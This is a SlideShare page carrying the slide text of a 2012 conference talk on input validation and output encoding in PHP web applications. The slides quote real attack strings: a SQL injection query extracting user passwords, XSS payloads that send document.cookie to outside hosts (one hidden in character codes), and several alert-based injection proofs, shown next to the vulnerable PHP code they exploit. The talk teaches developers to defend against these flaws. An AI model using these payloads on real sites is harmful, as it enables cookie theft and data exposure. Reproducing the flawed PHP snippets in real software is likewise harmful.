SlideShare a Scribd company logo

Input sanitization

Philip Tellis
Philip Tellis

The document discusses input validation and output encoding to prevent vulnerabilities like XSS and SQL injection. It provides examples of how unexpected input can enable attacks, like special characters or invalid data types being passed to endpoints and rendered unencoded. The key lessons are that input validation is needed to receive clean, expected data, while output encoding is crucial to prevent exploits when displaying data to users. Both techniques are important defenses that address different but related issues.

TechnologySpiritual
1 of 61
Download to read offline
Is What You Get, What You Expect to Get? Philip Tellis / philip@lognormal.com ConFoo.ca / 2012-03-01 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
IWYGWYETG ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 2
$ finger philip Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
WARNING ! This presentation may contain unreadable code. Attempting to read it is probably not worthwhile. Definitely not at 08:30. Screaming WTF!!1! probably is. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
How do you distinguish code from data? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
< > ’ " & % ‘ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
Failure to tell the difference. . . ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
Note: This talk is NOT about XSS or SQLi, but it might seem like it ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
Let’s look at a few examples ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
http://xxyyzz.com/forms/contact_form.asp?i= 0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28 %27%3c%28%20%27%2buserId%29,%28firstname %2b%27%20%27%2blastname%29,%28address%2b %27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16, %28email%2b%27%20-Password:%20%27%27 %2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21, 22,23,24,25,26,27,28,29,30%20FROM%20 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
http://xxyyzz.com/forms/contact_form.asp?i= 0’ UNION ALL SELECT 1,2,3,4,5, ( ’ < ( ’ + userId ) , ( firstname + ’ ’ + lastname ) , ( address + ’ city: ’ + city ) ,9,10,11,12,13,14,15,16, ( email + ’ -Password: ’ ’ + userpwd + ’ ) > ’ ) ,18,19,20,21, 22,23,24,25,26,27,28,29,30 FROM ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
<?php $id = htmlspecialchars($_GET[ ’id’ ]); ?> ... value : <?php echo ($id) ? $id : ’null’; ?> This is JavaScript code generated by PHP ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
<a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
<a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
use the quotes luke <a " <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
The char codes translate to: <img src=x onerror=(document.location=’ http://standard33.freehostia.com/CS/lg.php?info=’ +escape(document.cookie))> $f was html encoded, but used unquoted as an attribute value. Remember that spaces are never encoded. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
Expected a stock symbol, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020 onerroru003du0022alert(u0027xssu0027) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
h= " > < img src = " foo " onerror = " alert( ’ xss ’ ) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
h="><img src="foo" onerror="alert(’xss’) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
Expected a hostname, but got something completely different ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > That’s 0xe0, start of 3 byte seq ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Dear IE6 <input value=""onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
So what’s the common theme here? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
Should I be Validating Input or Encoding Output? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
They solve two different problems, and you need both ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
Output Encoding (done automatically by your framework) protects your users from XSS ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
Input Validation is a data quality issue ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
Is the input you get from a user of the type and range that you expect it to be? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
Sometimes it results in back end code injection ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
But it always results in bad data ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
Bonus Example: This hit me in production yesterday ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
regex to check if text was a subdomain of a known domain re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’); re.exec(ref) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
Sometimes IE8 will serve requests from a .mht file mhtml:file://C:Usersblah-blah-blah.mht ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
I expected the regex to reject this text ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
What I got was 100% CPU spent in regex backtracking ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
;( ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 38
Unrelated Bonus Example: From a WordPress theme ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
<?php $value=htmlspecialchars($_GET[’value’], ENT_QUOTES); ?> <input type="text" value="<?php echo $value ?>" onfocus="if(this.value==’<?php echo $value ?>’) {this.value = ’’;}" /> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’’ +alert(/xss/)+ ’’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
I have no idea what was expected here ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
Questions? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 43
Contact me Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ slideshare.net/bluesmoon ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44

Recommended

Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in Omeka
Arden Kirkland
 
The Evolution of the Accounting Localizations
The Evolution of the Accounting LocalizationsThe Evolution of the Accounting Localizations
The Evolution of the Accounting Localizations
Odoo
 
"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source code"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source code
Daniel_Rhodes
 
Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()
Craig Francis
 
123
123123
123
Mohamed Al Dalgamouni
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4
Federico Damián Lozada Mosto
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
Sanketkumar Biswas
 
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slidesDEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
Felipe Prado
 

Recommended

Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in Omeka
Arden Kirkland
 
The Evolution of the Accounting Localizations
The Evolution of the Accounting LocalizationsThe Evolution of the Accounting Localizations
The Evolution of the Accounting Localizations
Odoo
 
"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source code"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source code
Daniel_Rhodes
 
Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()
Craig Francis
 
123
123123
123
Mohamed Al Dalgamouni
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4
Federico Damián Lozada Mosto
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
Sanketkumar Biswas
 
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slidesDEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
Felipe Prado
 
Xcd pg
Xcd pgXcd pg
Xcd pg
CompaniaDekartSRL
 
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusAzure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Knowledge & Experience
 
PHP for Grown-ups
PHP for Grown-upsPHP for Grown-ups
PHP for Grown-ups
Manuel Lemos
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
Colin O'Dell
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
CO2 sequestration in a different manner
CO2 sequestration in a different mannerCO2 sequestration in a different manner
CO2 sequestration in a different manner
Green Minerals B.V.
 
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلمتفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
Islamic Invitation
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016
Colin O'Dell
 
Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!
Daniel Schneller
 
Ruby on Rails: Tasty Burgers
Ruby on Rails: Tasty BurgersRuby on Rails: Tasty Burgers
Ruby on Rails: Tasty Burgers
Aaron Patterson
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using php
Rishabh Srivastava
 
Clean code
Clean codeClean code
Clean code
iamAnaCortes
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
OSSCube
 
[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code
Future Processing
 
civil vs common law
civil vs common lawcivil vs common law
civil vs common law
vijay chittiboyina
 
Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020
Damien Seguy
 
Webit expo Standard Product
Webit expo Standard ProductWebit expo Standard Product
Webit expo Standard Product
Boji Ditcheva
 
Arabic uae e_services_user_manual
Arabic uae e_services_user_manualArabic uae e_services_user_manual
Arabic uae e_services_user_manual
Confidential
 
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
James Titcumb
 
Comparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerlComparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerl
Jason Stajich
 
Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010
Philip Tellis
 
Javascript charting with YUI-Flot
Javascript charting with YUI-FlotJavascript charting with YUI-Flot
Javascript charting with YUI-Flot
Philip Tellis
 

More Related Content

What's hot

Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
Colin O'Dell
 
Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!
Daniel Schneller
 
Webit expo Standard Product
Webit expo Standard ProductWebit expo Standard Product
Webit expo Standard Product
Boji Ditcheva
 
Arabic uae e_services_user_manual
Arabic uae e_services_user_manualArabic uae e_services_user_manual
Arabic uae e_services_user_manual
Confidential
 

What's hot (20)

Xcd pg
Xcd pgXcd pg
Xcd pg
 
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusAzure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
 
PHP for Grown-ups
PHP for Grown-upsPHP for Grown-ups
PHP for Grown-ups
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
CO2 sequestration in a different manner
CO2 sequestration in a different mannerCO2 sequestration in a different manner
CO2 sequestration in a different manner
 
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلمتفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016
 
Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!
 
Ruby on Rails: Tasty Burgers
Ruby on Rails: Tasty BurgersRuby on Rails: Tasty Burgers
Ruby on Rails: Tasty Burgers
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using php
 
Clean code
Clean codeClean code
Clean code
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code
 
civil vs common law
civil vs common lawcivil vs common law
civil vs common law
 
Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020
 
Webit expo Standard Product
Webit expo Standard ProductWebit expo Standard Product
Webit expo Standard Product
 
Arabic uae e_services_user_manual
Arabic uae e_services_user_manualArabic uae e_services_user_manual
Arabic uae e_services_user_manual
 
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
 
Comparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerlComparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerl
 

Viewers also liked

Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010
Philip Tellis
 
Boomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetupBoomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetup
Philip Tellis
 

Viewers also liked (7)

Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010
 
Javascript charting with YUI-Flot
Javascript charting with YUI-FlotJavascript charting with YUI-Flot
Javascript charting with YUI-Flot
 
Boomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetupBoomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetup
 
MySQL Business Continuity Planning
MySQL Business Continuity PlanningMySQL Business Continuity Planning
MySQL Business Continuity Planning
 
Over The Top Video
Over The Top VideoOver The Top Video
Over The Top Video
 
Websites on overdrive
Websites on overdriveWebsites on overdrive
Websites on overdrive
 
Improving D3 Performance with CANVAS and other Hacks
Improving D3 Performance with CANVAS and other HacksImproving D3 Performance with CANVAS and other Hacks
Improving D3 Performance with CANVAS and other Hacks
 

Similar to Input sanitization

Becoming a better WordPress Developer
Becoming a better WordPress DeveloperBecoming a better WordPress Developer
Becoming a better WordPress Developer
Joey Kudish
 
Ruby on Rails For Java Programmers
Ruby on Rails For Java ProgrammersRuby on Rails For Java Programmers
Ruby on Rails For Java Programmers
elliando dias
 
Error Management: Future vs ZIO
Error Management: Future vs ZIOError Management: Future vs ZIO
Error Management: Future vs ZIO
John De Goes
 
Dealing with Legacy PHP Applications
Dealing with Legacy PHP ApplicationsDealing with Legacy PHP Applications
Dealing with Legacy PHP Applications
Clinton Dreisbach
 

Similar to Input sanitization (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Big security for big data
Big security for big dataBig security for big data
Big security for big data
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 
Zend Certification PHP 5 Sample Questions
Zend Certification PHP 5 Sample QuestionsZend Certification PHP 5 Sample Questions
Zend Certification PHP 5 Sample Questions
 
Lca05
Lca05Lca05
Lca05
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
 
Dealing With Legacy PHP Applications
Dealing With Legacy PHP ApplicationsDealing With Legacy PHP Applications
Dealing With Legacy PHP Applications
 
C#7, 7.1, 7.2, 7.3 e C# 8
C#7, 7.1, 7.2, 7.3 e C# 8C#7, 7.1, 7.2, 7.3 e C# 8
C#7, 7.1, 7.2, 7.3 e C# 8
 
Becoming a better WordPress Developer
Becoming a better WordPress DeveloperBecoming a better WordPress Developer
Becoming a better WordPress Developer
 
Ruby on Rails For Java Programmers
Ruby on Rails For Java ProgrammersRuby on Rails For Java Programmers
Ruby on Rails For Java Programmers
 
F2E's Creeds
F2E's CreedsF2E's Creeds
F2E's Creeds
 
Error Management: Future vs ZIO
Error Management: Future vs ZIOError Management: Future vs ZIO
Error Management: Future vs ZIO
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
HTML5 and Other Modern Browser Game Tech
HTML5 and Other Modern Browser Game TechHTML5 and Other Modern Browser Game Tech
HTML5 and Other Modern Browser Game Tech
 
From clever code to better code
From clever code to better codeFrom clever code to better code
From clever code to better code
 
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backVladimir Vorontsov - Splitting, smuggling and cache poisoning come back
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back
 
Dealing with Legacy PHP Applications
Dealing with Legacy PHP ApplicationsDealing with Legacy PHP Applications
Dealing with Legacy PHP Applications
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
Questioning the status quo
Questioning the status quoQuestioning the status quo
Questioning the status quo
 
OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019
 

More from Philip Tellis

Frontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou FurieuxFrontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou Furieux
Philip Tellis
 
Improving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFramesImproving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFrames
Philip Tellis
 
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Philip Tellis
 
The Statistics of Web Performance Analysis
The Statistics of Web Performance AnalysisThe Statistics of Web Performance Analysis
The Statistics of Web Performance Analysis
Philip Tellis
 
Abusing JavaScript to Measure Web Performance
Abusing JavaScript to Measure Web PerformanceAbusing JavaScript to Measure Web Performance
Abusing JavaScript to Measure Web Performance
Philip Tellis
 
Analysing network characteristics with JavaScript
Analysing network characteristics with JavaScriptAnalysing network characteristics with JavaScript
Analysing network characteristics with JavaScript
Philip Tellis
 
A Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web TrafficA Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web Traffic
Philip Tellis
 
Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?
Philip Tellis
 

More from Philip Tellis (20)

Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
Frontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou FurieuxFrontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou Furieux
 
Frontend Performance: Expert to Crazy Person
Frontend Performance: Expert to Crazy PersonFrontend Performance: Expert to Crazy Person
Frontend Performance: Expert to Crazy Person
 
Beyond Page Level Metrics
Beyond Page Level MetricsBeyond Page Level Metrics
Beyond Page Level Metrics
 
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
mmm... beacons
mmm... beaconsmmm... beacons
mmm... beacons
 
RUM Distillation 101 -- Part I
RUM Distillation 101 -- Part IRUM Distillation 101 -- Part I
RUM Distillation 101 -- Part I
 
Improving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFramesImproving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFrames
 
Extending Boomerang
Extending BoomerangExtending Boomerang
Extending Boomerang
 
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
 
The Statistics of Web Performance Analysis
The Statistics of Web Performance AnalysisThe Statistics of Web Performance Analysis
The Statistics of Web Performance Analysis
 
Abusing JavaScript to Measure Web Performance
Abusing JavaScript to Measure Web PerformanceAbusing JavaScript to Measure Web Performance
